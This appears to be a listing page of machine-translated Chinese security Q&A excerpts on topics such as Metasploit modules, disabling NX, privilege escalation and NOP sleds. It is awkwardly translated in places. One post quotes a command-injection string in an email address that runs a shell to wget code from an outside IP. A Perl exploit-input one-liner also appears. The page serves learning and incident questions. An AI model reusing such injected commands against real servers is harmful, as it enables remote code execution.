exploit

将新模块放入 metasploit 框架(msf6)的过程是什么?
exploit

将新模块放入 metasploit 框架(msf6)的过程是什么?

我感兴趣的是了解新模块或漏洞如何进入 Metasploit Framework?我可以看到新的印刷噩梦漏洞正在处理/完成,所以我对 Kali 进行了更新,但它没有出现。 可能是因为它还没有在 repo 中? 无论如何,我从 GitHub 页面复制了 ruby​​ 代码并将其添加到: /usr/share/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb 然后我启动了 msf6 和reload_all。 这是将新模块、有效载荷、漏洞利用等引入...

Admin

可能检测到 CVE:2021-04-23 登录事件查看器(2021/04/23 @15:54:16)
exploit

可能检测到 CVE:2021-04-23 登录事件查看器(2021/04/23 @15:54:16)

可能检测到 CVE:2021-04-23 登录事件查看器(2021 年 4 月 23 日 @15:54:16)我目前正在扫描我的机器,但 Win Defender 能清除感染吗? 偶然间,我学会了如何通过 PowerShell 查询事件查看器并将其输出为 HTML 报告。太巧了! 事件查看器报告中的图像显示了事件查看器消息 编辑: Windows Defender 发现 0 个威胁 我还进行了完整的离线扫描,未发现任何威胁。还为这台机器添加了 MBAM Premium ...

Admin

在 Windows 10 上修补 SMBv1 客户端/服务器后使用它是否安全?
exploit

在 Windows 10 上修补 SMBv1 客户端/服务器后使用它是否安全?

您可能知道,在遭受多次勒索软件攻击后,微软决定在 Windows 操作系统上默认禁用 SMBv1。 然而尽管发布了补丁(MS17-010)来应对这些攻击,似乎微软仍然主张不是使用它。 更令人困惑的是,上面链接的补丁似乎只针对 SMBv1 服务器,而不是客户端: 此安全更新可修复 Microsoft Windows 中的漏洞。如果攻击者向 Microsoft Server Message Block 1.0 (SMBv1) 发送特制消息,最严重的漏洞可能允许远程执行代码服务器。 就我而言,在我的 Windows 10 机器上,我需要使用 SMBv1 客户端...

Admin

通过加号电子邮件地址后的可执行行进行攻击
exploit

通过加号电子邮件地址后的可执行行进行攻击

我运营着自己的邮件服务器,时不时有人会向 root 帐户发送垃圾邮件或神秘邮件。最近,我收到了一封空邮件,收件人是: root+${运行{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@我的域名.tld 该字符串中的第二个 IP 地址似乎属于我租用服务器的同一托管服务。跑步和获得在我看来非常可疑,但我在互联网上没有发现任何有关此类攻击的信息。 根据服务器的邮件日志,该邮件是从 148.72.206.111 发送的。然而,从字段设置为[电子邮件保护]。 有人知道这是...

Admin

Exploit Guard 阻止 Chrome 调用 Win32k.sys
exploit

Exploit Guard 阻止 Chrome 调用 Win32k.sys

我正在我们的 W10 企业映像中实施 Exploit Guard。我使用 GPO“使用一组通用的漏洞保护设置”对其进行配置,该 GPO 使用 XML 文件。最初,Chrome.exe 不包含在 XML 文件中。 我意识到当我打开 Chrome 时, 应用程序和服务日志 -> Microsoft -> Windows -> 安全缓解措施 -> 内核模式中出现了一个事件 ID 10 进程“\Device\HarddiskVolume2\Program Files (x86)\Google\Chrome\Application\chrom...

Admin

iMac 上不需要的且无效的蓝牙连接请求
exploit

iMac 上不需要的且无效的蓝牙连接请求

我遇到了与 Martin 相同的问题,Martin 在 2018 年 3 月 6 日 15:07 就遇到了此列表上的问题。没有为他提供可行的答案。他的链接:[不需要的 macOS 连接请求另外,adelejjeh 于 2016 年 10 月 8 日 15:36 提问MacBook 不断收到来自未经授权设备的蓝牙配对请求,在这种情况下建议关闭 Handoff 功能,但这对 adelejjeh 来说不起作用。 我的 iMac 运行 Mojave 10.14 时弹出了蓝牙连接请求。它来自一台名为“诺基亚 7.1”的设备,而我没有!我有点震惊,现在我不记得我是否单...

Admin

下载文件有多危险,即使是进行防病毒扫描
exploit

下载文件有多危险,即使是进行防病毒扫描

反病毒软件能否在检查文件时运行文件中的恶意软件(例如,缓冲区溢出技术)?如果可以,那么如何检查您要从互联网上下载的文件是否包含恶意软件,以便病毒不会在您的计算机上运行?我还想知道,今天在您使用反病毒软件扫描并运行下载的文件之前,它有多大可能有害(包括操作系统的缓冲区溢出)? ...

Admin

如何在 Linux 上禁用 NX
exploit

如何在 Linux 上禁用 NX

我正在学习堆栈缓冲区溢出利用,后来我发布了一个问题Shellcode 分段错误。关于从测试程序执行 shellcode 或将其注入易受攻击的程序会导致分段违规。现在我发现这可能是由 NX 引起的。当我在 dmesg 中搜索时,我发现了这一行: [ 0.000000] NX (Execute Disable) protection: active 所以我的问题是如何在 Linux 上禁用 NX 位。我正在使用带有 4.18.0 内核的 Kali Linux 64 位。 ...

Admin

PS/2 连接器真的比 USB 更安全吗?
exploit

PS/2 连接器真的比 USB 更安全吗?

是否可以利用像 USB 这样的 PS/2 连接器(例如橡皮鸭)? 出于安全原因,理论上应该可以虚拟化 PS/2 控制器,并对其进行重新编程以自动编写脚本,就像插入实际的键盘一样。 如果是这样,它真的像大多数人想象的那样比 USB 更安全吗? ...

Admin

从 www-data 升级到 root
exploit

从 www-data 升级到 root

一周前我遵循了这个程序创建具有隔离目录访问的 SFTP 服务器我编辑了 sshd_config,但之后我无法再以 ssh 模式访问,因此无法通过 sudo 更改为 root。但我仍具有 ftp 访问权限,并且我上传并使用 PHP SHELL 以 www-data 身份访问,但现在我如何获得 root 权限并编辑 sshd_config? 我的远程服务器是 Debian 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686 距离很远,我只是在远程工作。 ...

Admin

如何在终端中输入特定的十六进制字符来利用脚本
exploit

如何在终端中输入特定的十六进制字符来利用脚本

我尝试利用以下代码中的简单漏洞,但没有成功,因为我无法手动将特定字符放入终端。例如,如果应用程序从 stdin 读取一个字符,而我必须将一个字符放入终端,我会使用特定十六进制代码的 ascii 字符来覆盖“check”变量。但如果我在 python 或 perl 中将十六进制代码转换为 ascii 代码,然后手动将其放入终端,check 变量将被其他值(十六进制代码)覆盖。我如何正确覆盖“check”? 有漏洞的代码: root-me.org 的易受攻击的代码 ...

Admin

VPS 被入侵?配置错误?
exploit

VPS 被入侵?配置错误?

我已经租用 VPS 半年了(用于教育目的),我一直在尽可能地学习有关如何保证其安全的方法。 最近,它被入侵了,我怀疑它已被用作某人的代理,大约一周后我才意识到这一点。我收到了来自“匿名”和“nobody”用户通过 SSH 登录和退出的日志,CPU 使用率超出了图表范围 - 确实如此。 无论如何,我重新安装了它,并重新应用了我所知道的一切来测试它是否会再次发生,并且在重新安装后的短短 24 小时内,我认为它确实发生了。 以下是/var/log/auth.log令我感到偏执的各个日志: Oct 31 06:30:21 vultr su[24157]: S...

Admin

Perl 不打印 0x00
exploit

Perl 不打印 0x00

我想尝试使用 NOP SLED 技术。我将 sled 和 shellcode 放入环境变量中,并获取其地址。 因此,我想执行易受攻击的程序,并重复使用此地址作为参数,问题是它包含 0(零):0x00007fffffffe550 ./program_vuln $(perl -e 'print "\x50\xe5\xff\xff\xff\x7f\x00\x00"') Perl 不打印零,并且堆栈中的寻址变得非常混乱。 ...

Admin